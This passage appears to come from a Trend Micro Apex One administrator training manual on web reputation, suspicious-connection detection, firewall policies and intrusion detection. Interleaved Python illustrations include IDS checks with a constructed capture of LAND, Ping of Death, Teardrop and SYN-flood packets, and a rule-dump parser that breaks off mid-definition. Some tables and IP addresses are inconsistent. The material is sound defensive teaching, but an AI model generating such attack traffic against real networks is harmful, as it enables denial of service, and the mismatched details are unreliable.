enforced, Apex One will then either block or allow access to the URL.

Different sources can be used for score requests.


• Smart Protection Network
External Agents query the Web Reputation Service hosted on the Trend Micro Smart Protection
Network.
• Smart Protection Server
Internal Agents may query an onsite Smart Protection Server (either an integrated Smart
Protection Server hosted on the Apex One Server, or a Standalone Smart Protection Server in
the environment). This Server refreshes its credibility score data against the Smart Protection
Network on a regular basis.

[Figure: the Security Agent's URL Filtering Engine sends a Web Reputation query to Trend Micro or to a
local Smart Protection Server and receives a credibility score]

• In-Memory Cache
When a credibility score is retrieved from one of the sources, the score is cached locally. If a
cached entry for the visited Web site exists, the URL Filtering Engine uses the existing cached
rating.

[Figure: the same query path, with the credibility score also stored in and served from the local cache]

Note: The URL Filtering Engine is not actually involved in the URL blocking function. It merely provides
the information necessary for the blocking decision.

Credibility Scores
The Trend Micro Smart Protection Network, or the local Smart Protection Server, will return a
credibility score as follows:

Score     Rating              Description
81-100    Safe                No known or potential threats.
66-80     Suspicious          Possibly a phishing page or a potential source of malware or
51-65     Highly Suspicious   spyware. Associated with spam or has a history of being compromised.
0-50      Dangerous           Verified to be a phishing page or a source of malware or spyware.
71        Untested            Has not been tested by Trend Micro. Untested pages are not blocked
                              by default.

Configuring Web Reputation Settings


Apex One administrators determine the types of sites that are blocked by configuring the security
levels in the Web Reputation settings. In the Apex One Web Management console, click Agents >
Agent Management and right-mouse click specific domains or Agents. Click Settings > Web
Reputation Settings.

A site will be blocked if its score is less than or equal to the threshold value that a specific security
setting prescribes.

Threshold values on the Apex One Server are stored in ofcscan.ini, in the
[URL_FILTER_INI_SECTION] section.

Web threat security can only perform two actions: Block or Allow. If the score obtained is lower than or
equal to the threshold, then the website is blocked. Currently the lowest security setting uses a
threshold score of 50.

When a website is blocked, a notification window similar to this is displayed in the browser on the
Security Agent host.

Additionally, a Threat/Violation Found notification is displayed by the Security Agent. Clicking the
number next to Malicious URLs will display the log details of the violation.

Each time a URL is blocked a corresponding entry is also created in OfcUrlf.log, which is located in the
following folder on the endpoint computer:
…\Security Agent\Misc

Untested URLs
Administrators can also specify to block pages that have not been tested by Trend Micro. This
setting will block URLs that have a credibility score of 71 (Untested).

The Query Settings and Untested URLs sections in the Web Reputation Settings describe the actions
to perform on untested URLs.

Security Agents handle Untested URLs (score = 71) based on the relevant Web Reputation Settings.
• If Send queries to Smart Protection Servers is enabled, Agents will allow untested websites.
Smart Protection Servers do not store web reputation data for these websites.
• If Send queries to Smart Protection Servers is disabled, Agents will look at the setting Block
pages that have not been tested by Trend Micro and block or allow the websites accordingly.

Sample Sites
Trend Micro maintains sample sites for purposes of testing and demonstrating blocking and score
retrieval functionality. This is the Web Reputation Service equivalent to the EICAR test files and only
works on Web Reputation Service requests to the Global Trend Micro Web Reputation Server. The
following table lists these sites and their corresponding scores:

Credibility Score URL


91 wrs91.winshipway.com
81 wrs81.winshipway.com
71 wrs71.winshipway.com
61 wrs61.winshipway.com
51 wrs51.winshipway.com
41 wrs41.winshipway.com
31 wrs31.winshipway.com
21 wrs21.winshipway.com

Dealing With False Positives


The following website allows administrators to verify the credibility score of sites and to request
reassessments in the event that the prevailing score is inappropriate:

http://sitesafety.trendmicro.com/

Requests made through this site are not bound to a Service Level Agreement. Trend Micro
customers that require site reassessment are advised to contact Technical Support directly.

Intercepting HTTPS Traffic


HTTPS communication uses certificates to identify web servers. It encrypts data to prevent theft and
eavesdropping. Although more secure, accessing websites using HTTPS still has risks. Compromised
sites, even those with valid certificates, can host malware and steal personal information. In addition,
certificates are relatively easy to obtain, making it easy to set up malicious web servers that use
HTTPS.

Enable Check HTTPS URLs to reduce exposure to compromised and malicious sites that use HTTPS.

Apex One can monitor HTTPS traffic in the following browsers:

Browser Version
Microsoft Internet Explorer 8.x, 9.x, 10.x, 11.x
Mozilla Firefox 3.5 or later
Google Chrome Latest version
Microsoft Edge Latest version

For HTTPS monitoring in Firefox, Microsoft Edge, and Chrome, you must enable the Unauthorized
Change Prevention and Advanced Protection Service, as well as the Behavior Monitoring > Enable
program inspection to detect and block compromised executable files feature, on agents to scan
HTTPS traffic.

After enabling HTTPS scanning for the first time on Security Agents, users must enable the required
add-on in the following browsers before HTTPS scanning is operational:

Mozilla Firefox

For Security Agents running on Windows 7, 8, 8.1, 10, Server 2008 R2, or Server 2012, users must
enable the Trend Micro Osprey Firefox Extension add-on in the browser pop-up window (or in the
Add-ons > Extensions window).

For Security Agents running Windows XP, Vista, Server 2003 or Server 2008, users must enable
the Trend Micro NSC Firefox Extension add-on in the browser pop-up window (or in the Add-ons
> Extensions window).

Internet Explorer 8, 9, 10, and 11

Users must enable the Trend Micro Osprey Plug-in Class add-on in the browser pop-up window.

When prompted, click Choose add-ons and enable the Trend Micro add-ons.

Bypassing Web Reputation Analysis


There are two ways to bypass Web Reputation analysis of specific sites:
• Approved/Blocked URL lists: This method allows or excludes specific URLs.
• Application whitelist: This method automatically excludes connections from trusted
applications.

Approved/Blocked URLs

Apex One administrators can exclude specific Web sites from Web threat analysis. These sites
are designated in the Web Reputation Settings.

Type the URL and click either Add to Approved List or Add to Blocked List.

The approved list takes precedence over the blocked list. When a URL matches an entry in the
approved list, Agents always allow access to the URL, even if it is also in the blocked list.

Approved URLs are stored in ofcscan.ini, in the [URL_FILTER_INI_SECTION]. There are
separate approved lists for Internal Agents and External Agents.

Note: The internal and external policies can each only have 50 URLs on the approved list, for a total of
100 sites.

Approved lists can cover entire Web sites, or only specific pages.

The default selection covers the entire site. Apex One achieves this by using wildcards and
appending /* to the URL, as in this example:

http://uk.trendmicro-europe.com/*

To prevent tampering, URLs on the approved list are encrypted using the standard encryption
method that Trend Micro uses for most of its products (for example, passwords). These approved
list entries can be decrypted with existing support tools.

Application Whitelist

Apex One administrators can exclude traffic from specific applications from Web threat analysis
by doing the following:
1 In the Apex One Server installation directory, go to the ...\PCCSRV\ folder and open the
ofcscan.ini file using a text editor.
2 In the [Global Setting] section, add the following keys and assign the appropriate values, where x is
the number of approved processes (maximum 10) and ABC.exe, DEF.exe, etc. are process names:
[Global Setting]
SEG_WhiteListProcNum=x
SEG_WhiteListProc0=ABC.exe
SEG_WhiteListProc1=DEF.exe
...
SEG_WhiteListProc9=XYZ.exe
3 Save and close the file.
4 Log in to the Apex One Web Management console and navigate to Agents > Global Agent
Settings.
5 Click Save to deploy the settings to the Agents.
6 Restart the Security Agent or the computer to apply the registry settings.

Alternately, application whitelisting can also be done through the Windows Registry.
1 Open the Registry Editor (regedit) and locate the following entry:
[HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\Osprey\WhiteList]
2 Create a new key for the whitelisted application.

Note: Agent Self-Protection prevents any modification to the Apex One Registry keys. If the Security
Agent is not completely unloaded, you may be prevented from creating this new key. If an error is
displayed when trying to create the key, try again after a couple of minutes to allow the Agent to
finish the unloading process.

URL Analysis Order


The following steps, taken from the flowchart in the original, show the order of URL analysis decisions:
1 Start URL analysis.
2 Is the URL on the Allowed List? If yes, allow the site and end.
3 Is the URL on the Blocked List? If yes, block the site and end.
4 Is there an existing rating in the cache? If yes, use the existing rating. If no, request a Web
Reputation rating from the Trend Micro Smart Protection Network or the local Smart Protection
Server.
5 Evaluate the rating and perform the action based on the Web Reputation settings.

Note: If the Security Agent is not able to retrieve a score from any of the Smart Protection sources, it
defaults to fail open and the web site becomes accessible.

When a Standalone Smart Protection Server is being used, the order of analysis can be modified to
check the user-defined blocked list before the allowed list by making a Filter Priority selection
during first-time configuration.
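As an added illustration (not Trend Micro code), the following Python model walks a URL through the decision order above, applying the approved and blocked lists, the in-memory cache, the untested-URL settings, the score threshold from the Credibility Scores table and the fail-open behaviour. The class and function names are assumptions; the threshold of 50 is the lowest security level from the text, and any other threshold is the caller's choice.

```python
"""Model of the Security Agent's URL analysis order and block/allow decision.
Added illustration, not Trend Micro code: names are assumptions, and the
rating source stands in for the Smart Protection Network or local Server."""

from dataclasses import dataclass, field
from fnmatch import fnmatchcase

UNTESTED_SCORE = 71   # score returned for pages Trend Micro has not rated


@dataclass
class WebReputationSettings:
    threshold: int = 50                 # block when score <= threshold (50 = lowest level)
    approved: list = field(default_factory=list)   # e.g. "http://uk.trendmicro-europe.com/*"
    blocked: list = field(default_factory=list)
    send_queries_to_sps: bool = False   # "Send queries to Smart Protection Servers"
    block_untested: bool = False        # "Block pages that have not been tested by Trend Micro"
    blocked_list_first: bool = False    # Standalone Server "Filter Priority" selection


def on_list(url, patterns):
    """Entries ending in /* cover a whole site; other entries match one page."""
    return any(fnmatchcase(url, p) for p in patterns)


class WebReputationAgent:
    def __init__(self, settings, rating_source):
        """`rating_source(url)` returns a credibility score, or None when no
        Smart Protection source could be reached."""
        self.settings = settings
        self.rating_source = rating_source
        self.cache = {}   # in-memory cache of scores already retrieved

    def lookup_score(self, url):
        """Use the cached rating when one exists, otherwise query the source."""
        if url in self.cache:
            return self.cache[url]
        score = self.rating_source(url)
        if score is not None:        # a failed query is not cached
            self.cache[url] = score
        return score

    def decide(self, url):
        """Return ('allow' | 'block', reason) following the flowchart order."""
        s = self.settings
        checks = [("blocked", s.blocked, "block"), ("approved", s.approved, "allow")]
        if not s.blocked_list_first:
            checks.reverse()         # default order: approved list wins over blocked list
        for name, patterns, action in checks:
            if on_list(url, patterns):
                return action, f"{name} list"
        score = self.lookup_score(url)
        if score is None:
            return "allow", "no score available (fail open)"
        if score == UNTESTED_SCORE:
            if s.send_queries_to_sps:
                return "allow", "untested; Smart Protection Servers hold no rating"
            return ("block" if s.block_untested else "allow"), "untested"
        if score <= s.threshold:
            return "block", f"score {score} <= threshold {s.threshold}"
        return "allow", f"score {score} > threshold {s.threshold}"
```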

Assessment Mode
When in assessment mode, Security Agents allow access to all websites. For any accessed website
that violates the configured Security Level setting, the Security Agent logs the event only.
Assessment mode allows you to monitor website access and evaluate the safety of websites before
actively blocking users access. Based on your evaluation of the access logs, you can add trusted
websites to the Approved URL List before disabling assessment mode.

Detecting Suspicious Connections


The Suspicious Connection Service manages the User-defined and Global IP C&C lists, and monitors the
behavior of connections that endpoints make to potential C&C servers.

In the Apex One Web Management console, click Agents > Agent Management and right-mouse click
specific domains or Agents. Click Settings > Suspicious Connection Settings.

Detecting Connections Through the Global C&C List


The Global C&C IP list works in conjunction with the Network Content Inspection Engine (NCIE) to
detect network connections with Trend Micro confirmed C&C servers. NCIE detects C&C server
contact through any network channel. The Suspicious Connection Service logs all connection
information to servers in the Global C&C IP list for evaluation.

Enable Detect network connections made to addresses in the Global C&C IP list to monitor
connections made to Trend Micro confirmed C&C servers and select to Log only or Block
connections.

The User-defined Approved and Blocked IP lists allow further control over whether endpoints can
access specific IP addresses. Configure these lists when you want to allow access to an address
blocked by the Global C&C IP list or block access to an address that may pose a security risk.

Detecting Connections Through Malware Network Fingerprinting


After detecting malware on endpoints through Relevance Rule Pattern matching on network
packets, the Suspicious Connection Service can further investigate the connection behavior to
determine if a C&C callback occurred. After detecting a C&C callback, the Suspicious Connection
Service can attempt to block and clean the source of the connection using GeneriClean technology.

To allow Apex One agents to attempt to clean connections made to C&C servers, enable Clean
suspicious connections when a C&C callback is detected. Apex One agents use GeneriClean to clean
the malware threat and terminate the connection to the C&C server.

GeneriClean, also known as referential cleaning, is a new technology for cleaning viruses/malware
even without the availability of virus cleanup components. Using a detected file as basis, GeneriClean
determines if the detected file has a corresponding process/service in memory and a registry entry,
and then removes them altogether.

Protecting Against Browser Exploits


The Apex One Browser Exploit Solution consists of the following patterns:
• Browser Exploit Prevention Pattern: This pattern identifies the latest web browser exploits and
prevents the exploits from being used to compromise the web browser.
• Script Analyzer Pattern: This pattern analyzes scripts in Web pages and identifies malicious
scripts and Applets.

These files are stored on the Apex One Server in the following folder:
...\PCCSRV\Download\Pattern

When Agents are deployed, these pattern file zips are extracted and deployed to the Agents in the
following folder:
...\Security Agent\CCSF\module\BES

Click Block pages containing malicious script to identify Web browser exploits and malicious scripts, and
prevent the use of these threats from compromising the web browser. Web Reputation utilizes both the
Browser Exploit Prevention pattern and the Script Analyzer pattern to identify and block web pages
before exposing the system.

These files are located on the Apex One Server in the following folder:
C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Download\Pattern

Note: The Browser Exploit Prevention feature requires that you enable the Advanced Protection
Service under Agents > Agent Management, then Settings > Additional Service Settings.

Apex One can protect against malicious scripts with add-ons in the following browsers:

Browser Version
Microsoft Internet Explorer 7.x, 8.x, 9.x, 10.x, 11.x
Mozilla Firefox 3.5 or later
Google Chrome Latest version
Microsoft Edge Latest version

Lesson 12: Protecting Endpoint Computers Through Traffic Filtering

Lesson Objectives:

After completing this lesson, participants will be able to:


• Enable traffic filtering on Security Agent endpoints
• Configure firewall policies
• Configure firewall profiles and assign to Agent computers

Traffic Filtering
The Security Agent provides the following options to filter network traffic:
• Filtering incoming and outgoing traffic based on certain criteria
• Filtering incoming and outgoing traffic generated by specific applications
• Filtering based on the Certified Safe Software List
• Filtering based on the connection state and specific conditions in a connection
• Filtering based on patterns in network packets that may signal an attack on the Agent computer
through Intrusion Detection

Firewall Filtering
The Apex One Firewall filters all incoming and outgoing traffic, providing the ability to block certain
types of traffic based on criteria, including:
• Direction (inbound/outbound)
• Protocol (TCP/UDP/ICMP/ICMPv6)
• Destination ports
• Source and destination endpoints

The Apex One firewall provides stateful packet-level inspection of TCP, UDP and ICMP traffic to help
protect against network attacks, including ones that originate from within the network. The Apex
One firewall can be enabled/disabled by domain, group or individual Agent. This configuration is
applied through the firewall policies and profiles.

Apex One firewall functionality is provided by the Trend Micro Common Firewall Driver. The firewall
driver is implemented as an NDIS intermediate driver and contains a mini-port interface. This detail
will be useful for network administrators seeking to harden their Security Agent hosts.

Apex One uses Security Levels and Exceptions to specify how traffic is filtered for the specified
criteria.

Application Filtering
The Apex One Firewall filters incoming and outgoing traffic for applications specified in the Firewall
Exception List, allowing these applications access to the network. Applications can be defined by
identifying the full path or the corresponding Registry entries.

Certified Safe Software List


The local Certified Safe Software List contains a list of applications that can bypass firewall policy
security levels. The Apex One Firewall automatically allows applications in the Certified Safe
Software List to run and access the network.

You can also allow Security Agents to query the dynamically-updated global Certified Safe Software
List hosted on Trend Micro servers.

Note: Querying the Global Certified Safe Software List requires that you enable both the Unauthorized
Change Prevention Service and the Certified Safe Software Service.

Stateful Inspection
The Apex One Firewall uses stateful inspection to monitor and remember all connections and
connection states to the Security Agent. The Apex One Firewall can identify specific conditions in
any connection, predict what actions should follow, and detect disruptions in normal connections.
Therefore, effective use of the firewall not only involves creating profiles and policies, but also
analyzing connections and filtering packets that pass through the firewall.

Intrusion Detection System


The Intrusion Detection System (IDS) helps identify patterns in network packets that may indicate an
attack on the Security Agent. The Intrusion Detection System can help prevent the following well-
known intrusions:
• Too Big Fragment: A Denial of Service attack where a hacker directs an oversized TCP/UDP
packet at a target endpoint. This can cause a buffer overflow, which can freeze or restart the
endpoint.
• Ping of Death: A Denial of Service attack where a hacker directs an oversized ICMP/ICMPv6
packet at a target endpoint. This can cause a buffer overflow, which can freeze or reboot the
endpoint.
• Conflicted ARP: A type of attack where a hacker sends an Address Resolution Protocol (ARP)
request with the same source and destination IP address to a targeted endpoint. The target
endpoint continually sends an ARP response (its MAC address) to itself, causing the endpoint to
freeze or crash.
• SYN Flood: A Denial of Service attack where a program sends multiple TCP synchronization
(SYN) packets to the endpoint, causing the endpoint to continually send synchronization
acknowledgment (SYN/ACK) responses. This can exhaust endpoint memory and eventually crash
the endpoint.
• Overlapping Fragment: Similar to a Teardrop attack, this Denial of Service attack sends
overlapping TCP fragments to the endpoint. This overwrites the header information in the first
TCP fragment and may pass through a firewall. The firewall may then allow subsequent
fragments with malicious code to pass through to the target endpoint.
• Teardrop: Similar to an overlapping fragment attack, this Denial of Service attack deals with IP
fragments. A confusing offset value in the second or later IP fragment can cause the operating
system on the receiving endpoint to crash when attempting to reassemble the fragments.
• Tiny Fragment Attack: A type of attack where a small TCP fragment size forces the first TCP
packet header information into the next fragment. This can cause routers that filter traffic to
ignore the subsequent fragments, which may contain malicious data.
• Fragmented IGMP: A Denial of Service attack that sends fragmented IGMP packets to a target
endpoint, which cannot properly process the IGMP packets. This can freeze or slow down the
endpoint.
• LAND Attack: A type of attack that sends IP synchronization (SYN) packets with the same source
and destination address to the endpoint, causing the endpoint to send the synchronization
acknowledgment (SYN/ ACK) response to itself. This can freeze or slow down the endpoint.
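As an added example rather than Trend Micro's own IDS logic, the following Python code applies detection checks for several of the patterns listed above to a constructed packet capture; the packet representation, field names and the SYN-flood threshold are assumptions made for the illustration.

```python
"""Detection checks for several of the intrusion patterns listed above, run over a
constructed packet capture. Added illustration, not Trend Micro's IDS or Common
Firewall Driver: packet representation, field names and thresholds are assumptions."""

from collections import defaultdict

IP_MAX_LEN = 65535      # largest datagram IP can describe; a longer reassembly is oversized
TCP_MIN_HEADER = 20     # a first fragment shorter than this cannot hold a TCP header
SYN_FLOOD_LIMIT = 100   # bare SYNs to one endpoint within the window before alerting
SYN_FLOOD_WINDOW = 1.0  # seconds


def pkt(time, proto, src_ip, dst_ip, **fields):
    """Build a packet record (assumed representation, not a real capture format)."""
    return {"time": time, "proto": proto, "src_ip": src_ip, "dst_ip": dst_ip, **fields}


def check_packet(p):
    """Return the intrusion patterns a single packet matches on its own."""
    hits = []
    flags = p.get("flags", set())
    same_endpoints = p["src_ip"] == p["dst_ip"]
    if p["proto"] == "arp" and p.get("op") == "request" and same_endpoints:
        hits.append("Conflicted ARP")        # the target would answer itself
    if p["proto"] == "tcp" and "SYN" in flags and same_endpoints:
        hits.append("LAND Attack")           # the SYN/ACK would be sent to itself
    if (p["proto"] == "tcp" and p.get("more_fragments") and p.get("frag_offset") == 0
            and p.get("frag_len", TCP_MIN_HEADER) < TCP_MIN_HEADER):
        hits.append("Tiny Fragment Attack")  # TCP header pushed into the next fragment
    return hits


def check_fragments(frags):
    """Check the fragments of one datagram (same src, dst and IP id) for an
    oversized reassembly and for overlapping offsets."""
    hits = []
    proto = frags[0]["proto"]
    frags = sorted(frags, key=lambda f: f["frag_offset"])
    if max(f["frag_offset"] + f["frag_len"] for f in frags) > IP_MAX_LEN:
        hits.append("Ping of Death" if proto in ("icmp", "icmpv6") else "Too Big Fragment")
    prev_end = 0
    for f in frags:
        if f["frag_offset"] < prev_end:      # this fragment rewrites earlier bytes
            hits.append("Overlapping Fragment/Teardrop")
            break
        prev_end = f["frag_offset"] + f["frag_len"]
    if proto == "igmp" and len(frags) > 1:
        hits.append("Fragmented IGMP")
    return hits


class SynFloodDetector:
    """Sliding-window count of bare SYNs (no ACK) received per destination."""

    def __init__(self, limit=SYN_FLOOD_LIMIT, window=SYN_FLOOD_WINDOW):
        self.limit, self.window = limit, window
        self.syn_times = defaultdict(list)   # dst_ip -> timestamps of SYNs seen

    def observe(self, p):
        """Return True once the destination has seen more than `limit` SYNs in the window."""
        flags = p.get("flags", set())
        if p["proto"] != "tcp" or "SYN" not in flags or "ACK" in flags:
            return False
        times = self.syn_times[p["dst_ip"]]
        times.append(p["time"])
        while p["time"] - times[0] > self.window:
            times.pop(0)
        return len(times) > self.limit


def analyse(packets, syn_limit=SYN_FLOOD_LIMIT):
    """Run every check over a capture; return distinct (pattern, src_ip, dst_ip) alerts."""
    alerts = []
    flood = SynFloodDetector(limit=syn_limit)
    datagrams = defaultdict(list)   # (src_ip, dst_ip, ip_id) -> fragments
    for p in packets:
        alerts += [(name, p["src_ip"], p["dst_ip"]) for name in check_packet(p)]
        if flood.observe(p):
            alerts.append(("SYN Flood", p["src_ip"], p["dst_ip"]))
        if p.get("more_fragments") or p.get("frag_offset", 0) > 0:
            datagrams[(p["src_ip"], p["dst_ip"], p["ip_id"])].append(p)
    for (src, dst, _), frags in datagrams.items():
        alerts += [(name, src, dst) for name in check_fragments(frags)]
    return list(dict.fromkeys(alerts))


# Constructed sample capture; each record is labelled with the pattern it exercises.
SAMPLE_CAPTURE = [
    pkt(0.00, "tcp", "10.0.0.7", "10.0.0.7", flags={"SYN"}),                                     # LAND
    pkt(0.01, "arp", "10.0.0.9", "10.0.0.9", op="request"),                                       # Conflicted ARP
    pkt(0.02, "icmp", "10.0.0.20", "10.0.0.7", ip_id=1, frag_offset=0, frag_len=65000, more_fragments=True),
    pkt(0.03, "icmp", "10.0.0.20", "10.0.0.7", ip_id=1, frag_offset=65000, frag_len=1480, more_fragments=False),
    pkt(0.04, "tcp", "10.0.0.21", "10.0.0.7", ip_id=2, frag_offset=0, frag_len=8, more_fragments=True),   # Tiny
    pkt(0.05, "tcp", "10.0.0.21", "10.0.0.7", ip_id=2, frag_offset=8, frag_len=40, more_fragments=False),
    pkt(0.06, "tcp", "10.0.0.22", "10.0.0.7", ip_id=3, frag_offset=0, frag_len=100, more_fragments=True),
    pkt(0.07, "tcp", "10.0.0.22", "10.0.0.7", ip_id=3, frag_offset=60, frag_len=100, more_fragments=False),  # Overlap
    pkt(0.08, "tcp", "10.0.0.5", "10.0.0.7", flags={"SYN", "ACK"}),                              # benign reply
] + [pkt(0.1 + i * 0.001, "tcp", "10.0.0.30", "10.0.0.7", flags={"SYN"}) for i in range(8)]
```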

Enabling the Apex One Firewall


During the Apex One server installation, you are prompted to enable or disable the Apex One firewall. If
you disabled the firewall during installation, you can enable it through the Apex One Web Management
console to protect the Agent from intrusions. It can be enabled at any level in the Agent tree.

Enabling the Apex One Firewall on Selected Endpoints


To enable the firewall on selected endpoints, perform the following steps:
1 Go to Agents > Agent Management.
2 In the Agent tree, click the domain, group or specific Agents.
3 Click Settings > Additional Service Settings and enable the Firewall service on desktops or
servers.


4 Click Save to apply settings to the domain, group or Agents. If you applied the service to the root
domain, choose Apply to All Agents or Apply to Future Domains Only.

Firewall Policies and Profiles


The Apex One firewall uses policies and profiles to organize and customize methods for protecting
networked endpoints.

The following steps must be completed to make use of the Apex One firewall capabilities:
1 Create a policy: The policy allows you to select a security level that blocks or allows traffic on
networked endpoints and enables firewall features.
2 Add exceptions to the policy: Exceptions allow Security Agents to deviate from a policy. With
exceptions, you can specify Agents, and allow or block certain types of traffic, despite the
security level setting in the policy. For example, block all traffic for a set of Agents in a policy, but
create an exception that allows HTTP traffic so Agents can access a Web server.
3 Create and assign profiles to Security Agents: A firewall profile includes a set of Agent attributes
and is associated with a policy. When any Agent matches the attributes specified in the profile,
the associated policy is triggered.

Firewall Policies
Apex One Firewall policies allow you to block or allow certain types of network traffic. A policy also
defines which firewall features are enabled or disabled. The policy is then assigned to one or multiple
firewall profiles.

When configuring a firewall policy, the following settings are available:


• Security Level: This general setting blocks or allows all inbound and/or all outbound traffic
on the Security Agent endpoint.
• Firewall Features: These settings specify whether to enable or disable the Apex One firewall,
the Intrusion Detection System (IDS), and the firewall violation notification message.
• Certified Safe Software List: These settings specify whether to allow certified safe
applications to connect to the network.


• Exceptions: This list of configurable exceptions blocks or allows various types of network
traffic.

You can grant end-users the privilege to modify the security level and policy exception list when
creating Firewall Profiles.

To create or modify policies, complete the following steps:


1 Go to Agents > Firewall > Policies. Click an existing policy to modify, or click Add Policy.

2 Type a Name for the policy.


3 Click to select a Security level from the list:
• High: blocks all incoming and outgoing traffic except for that which meets the criteria
defined in an exception
• Medium: blocks inbound traffic, but allows outbound traffic except for that which meets the
criteria defined in an exception
• Low: allows all inbound or outbound traffic except for that which meets the criteria defined
in an exception
4 Click to enable the required Firewall Features. When Intrusion Detection System is enabled, all
the intrusions listed previously are blocked.
5 Click to enable the Local or Global Certified Safe Software List. Applications in this list are
exempt from filtering when the security level is set to Medium or High.
6 Click to select the firewall Exceptions, or click Add to create a new exception.
7 Click Save.


Exceptions

Exceptions override the security level assigned to the policy and block or allow various types of
network traffic.
1 Click Add Exception on the Firewall Policy page.

2 Type a Name for the policy exception.


3 Select the type of Application. You can select all applications, or specify application path or
registry keys.

Note: Verify the name and full paths entered. Application exceptions do not support wildcards.

4 Select the Action Apex One performs on network traffic (block or allow traffic that meets the
exception criteria) and the traffic Direction (inbound or outbound network traffic on the Security
Agent endpoint).
5 Select the type of network Protocol:
• TCP
• UDP
• ICMP
• ICMPv6
6 Specify Ports on the Security Agent endpoint on which to perform the action.


7 Select Security Agent endpoint IP Addresses to include in the exception. For example, if you
chose to deny all network traffic (inbound and outbound) and type the IP address for a single
endpoint on the network, then any Security Agent that has this exception in its policy cannot
send or receive data to or from that IP address.
8 Click Save.
9 Click one of the following buttons to apply the new exception to the list:
• Save Template Changes: Saves the current exception template list settings but does not
apply the settings to existing policies.
• Save and Apply to Existing Policies: Saves the current exception template list settings and
immediately applies the settings to all existing policies.

Firewall Profiles
Security Agent endpoints may require different levels of protection. Firewall profiles provide
flexibility by letting you choose the attributes that a single Agent or group of Agents must have
before a policy is applied, and so identify which Agents will receive the policy.
1 To view the available profiles, click Agents > Firewall > Profiles.


2 Click a profile in the list to edit, or click Add to create a new profile.

3 Click Enable this profile to allow Apex One to deploy the profile to Security Agents.
4 Type a Name to identify the profile and an optional description.
5 Select a Policy to be applied through this profile.
6 Specify the Agent endpoints to which Apex One applies the policy. Select endpoints based on the
following criteria:
• IP address
• Domain: Click Select Domains from the Agent Tree and choose a domain

Note: Only users with full domain permissions can select domains.

• Endpoint: Click Select Endpoints from the Agent Tree and choose a specific endpoint
• Platform
• Logon name
• NIC description: Type a full or partial description, without wildcards.


Note: Trend Micro recommends typing the NIC card manufacturer because NIC descriptions typically
start with the manufacturer’s name. For example, if you typed Intel, all Intel-manufactured
NICs will satisfy the criteria. If you typed a particular NIC model, such as Intel(R) Pro/100,
only NIC descriptions that start with Intel(R) Pro/100 will satisfy the criteria.

7 Agent Location: Select from the following:


• Internal - Security Agents can connect to the Apex One Server or a configured reference
server
• External - Security Agents cannot connect to the Apex One Server or a configured reference
server
8 Select whether to grant users the privilege to change the firewall security level or edit a
configurable list of exceptions to allow specified types of traffic.
9 Click Save, then click Apply Profile to Agents. The profile is deployed to the Agents identified in
the profile. A message is displayed advising you that the Security Agents are being notified of the
new settings.

10 When the policy is triggered, a notification is displayed on the Agent computer.


11 Click the number next to Firewall Violations or Network Viruses to view logging details regarding
the firewall violation.

Note: Firewall logs are uploaded every 4 hours by default. This can be changed in the Web
Management console under Agents > Global Agent Settings > Security Settings > Firewall
Settings.
On the Agent this setting appears in the Windows Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\PFW\ActiveLogReportFrequency

Viewing Firewall Rules


Administrators can view the rules currently in effect on a Security Agent by instructing the Agent
to dump its firewall rules. By default, the dump of the firewall rules is stored in a text file called
!PfwDump.txt created in the Security Agent folder.

To dump the firewall rules, complete the following steps:


1 Open the Windows Command Prompt and navigate to the Security Agent folder, for example:
...\Trend Micro\Security Agent
2 Type the following command:
tmpfw dump


3 Locate the !PfwDump.txt file.

The following example shows the access rule-set portion of the dump.
========== CFW Rules ===============

[65535]-[10]: ACCESS, ANY, IPV4, UDP, , , , 67:68, ACCEPT,

[65535]-[20]: ACCESS, ANY, IPV6, UDP, , , , 546:547, ACCEPT,

. . .

[2]-[10205]: ACCESS, ANY, IPV4, TCP, 172.16.5.105, ! 172.16.5.105, , 63204, ACCEPT, 2:0:TrustZone

. . .

[1]-[65000]: ACCESS, ANY, IPV4, ANY, , , , , DROP, 8:0:Anchor

The following breakdown shows the different parts of a rule dump file entry:

[ 2]-[10205]:ACCESS,ANY,IPV4,TCP,172.18.5.105,!172.18.5.105, ,63204,ACCEPT,2:0:TrustZone

• Access rule type number: [ 2]-[10205]
• Firewall rule type: ACCESS
• Direction: ANY
• L3 Protocol: IPV4
• L4 Protocol: TCP
• Source IP address: 172.18.5.105
• Destination IP or range: !172.18.5.105
• Source port: (empty)
• Destination port: 63204
• Action: ACCEPT
• Rule description: 2:0:TrustZone

The following list explains each part of the rule shown:

• Access rule type number: Identifies the type of access rule.
• Firewall rule type: Identifies the type of rule. The ACCESS value in the sample above indicates
that it is an access rule.
• Direction: Specifies the direction of a packet relative to the Security Agent host. Valid values
are: IN, OUT, and ANY.
• L3 Protocol: The Network layer protocol used with the packet. Valid values are IPv4, IPv6, and
Any. In the example above, the rule refers to IPv4 traffic.
• L4 Protocol: The Transport layer protocol used with the packet. In the example above, the rule
applies to TCP-based traffic.
• Source IP address: The IP address of the origin of the packet. In the example above, the source
is 172.18.5.105.
• Destination IP address or range: The machine to which the packet is sent. Note the ! used in the
example above. This character represents "not"; the rule in the sample therefore applies to any
packet that was not sent to the source itself.
• Source port: The port through which the packet was sent. In the example above, a source port
was not specified.
• Destination port: The port at which an application at the destination is listening for the packet.
• Action: The action that the firewall takes if a packet matches this rule.
• Rule description: A description of the rule's purpose.
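As an added example (not Trend Micro code), the following Python parses access-rule lines in the dump format shown above and reports which rule a given packet would hit. Treating "a:b" in a port field as an inclusive range, an empty field as "match anything", and the dump order as the evaluation order are assumptions, not documented behaviour.

```python
"""Parser for the access-rule lines of an Apex One firewall rule dump (!PfwDump.txt).
Added example, not Trend Micro code. Field order follows the list above. Treating
"a:b" in a port field as an inclusive range, an empty field as "match anything",
and the dump order as the evaluation order are assumptions, not documented facts.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample modelled on the dump excerpt above (not a real capture).
SAMPLE_DUMP = """========== CFW Rules ===============
[65535]-[10]: ACCESS, ANY, IPV4, UDP, , , , 67:68, ACCEPT,
[65535]-[20]: ACCESS, ANY, IPV6, UDP, , , , 546:547, ACCEPT,
[2]-[10205]: ACCESS, ANY, IPV4, TCP, 172.16.5.105, ! 172.16.5.105, , 63204, ACCEPT, 2:0:TrustZone
[1]-[65000]: ACCESS, ANY, IPV4, ANY, , , , , DROP, 8:0:Anchor
"""

RULE_RE = re.compile(r"^\[\s*(\d+)\]-\[\s*(\d+)\]:\s*(.*)$")


@dataclass
class CfwRule:
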